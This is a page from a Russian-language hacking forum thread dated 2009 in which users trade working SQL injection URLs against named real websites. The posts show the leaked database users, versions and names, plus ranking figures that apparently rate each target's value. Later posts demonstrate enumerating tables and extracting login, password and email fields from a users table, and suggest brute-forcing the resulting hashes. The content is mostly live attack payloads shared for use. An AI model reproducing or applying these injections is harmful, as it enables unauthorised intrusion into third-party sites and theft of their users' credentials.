ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7431  
Старый 10.01.2009, 15:03
Аватар для UgMan
UgMan
Новичок
Регистрация: 22.12.2008
Сообщений: 11
Провел на форуме:
64392

Репутация: 2
По умолчанию

Жеееесть, примерно число посетителей 3,296,412 visits per day
 
Ответить с цитированием

  #7432  
Старый 10.01.2009, 15:20
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

IMAGES FESTIVAL
Код:
http://www.imagesfestival.com/call.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11--
user(): imagesfest@localhost
version(): 4.0.27-icd1-log
database(): imagesfestival
тИЦ: 20
PR: 5



Ambro and Associates Mortgage Consultants
Код:
http://www.aamc.ca/about.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8--
user(): ambro@pearlcrescent.com
version(): 5.0.67-log
database(): ambro
PR: 2
 
Ответить с цитированием

  #7433  
Старый 10.01.2009, 16:21
Аватар для fortune
fortune
Новичок
Регистрация: 08.01.2009
Сообщений: 5
Провел на форуме:
14109

Репутация: 11
По умолчанию

http://cbr.med.harvard.edu/page.php?branch=newsroom&page=releases&type=9&year =2004&id=61%20union%20all%20select%201,2,3,4,5,6,7--

version: 4.1.22-log
user: www@server1.cbrinstitute.org
Database: cbr
 
Ответить с цитированием

  #7434  
Старый 10.01.2009, 17:12
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Код:
http://kofein.kiev.ua/?menu=12&info=3&did=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())--
Цитата:
5.0.67-community-log:kofein_admin@localhost:kofein_forum2
 
Ответить с цитированием

  #7435  
Старый 10.01.2009, 19:43
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.moto.ru/news/motonews.php?id=-3917+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database())--

тИЦ = 1100

Version:4.1.22-standard-log
User:aprilia_aprilia@localhost
Database:aprilia_aprilia
 
Ответить с цитированием

  #7436  
Старый 10.01.2009, 19:48
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.mad-love.ru/blogs.php?user=-1+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9--
madlove1_user@localhost:5.0.32-Debian_7etch5-log:madlove1_db
PR:2
ТиЦ:80
Код:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,table_name+from+information_schema.tables+limit+0,1--
Код:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,login+from+users+limit+0,1--
таблицу с паролями ненашол=/

Последний раз редактировалось ..::TROYAN::..; 10.01.2009 в 19:51..
 
Ответить с цитированием

  #7437  
Старый 10.01.2009, 19:56
Аватар для FunkFan
FunkFan
Новичок
Регистрация: 07.01.2009
Сообщений: 6
Провел на форуме:
8492

Репутация: 0
По умолчанию

spherics помойму этой иньекции уже нет. А как кстати такие хэши расшифровываються?
 
Ответить с цитированием

  #7438  
Старый 10.01.2009, 20:01
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от FunkFan  
А как кстати такие хэши расшифровываються?
не расшифровываються а брутяться, password pro - тип хеша Mysql5
 
Ответить с цитированием

  #7439  
Старый 10.01.2009, 20:17
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от ..::TROYAN::..  
таблицу с паролями ненашол=/
работая лимитом получаем:
Код:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,table_name+from+information_schema.tables+limit+64,1--
вот:
Код:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(login,0x3a,psw,0x3a,email)+from+users+limit+1,1--
 
Ответить с цитированием

  #7440  
Старый 10.01.2009, 20:21
Аватар для FunkFan
FunkFan
Новичок
Регистрация: 07.01.2009
Сообщений: 6
Провел на форуме:
8492

Репутация: 0
По умолчанию

Цитата:
Сообщение от AkyHa_MaTaTa  
не расшифровываються а брутяться, password pro - тип хеша Mysql5
а мог бы уточнить название а то много разных прог находиться?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ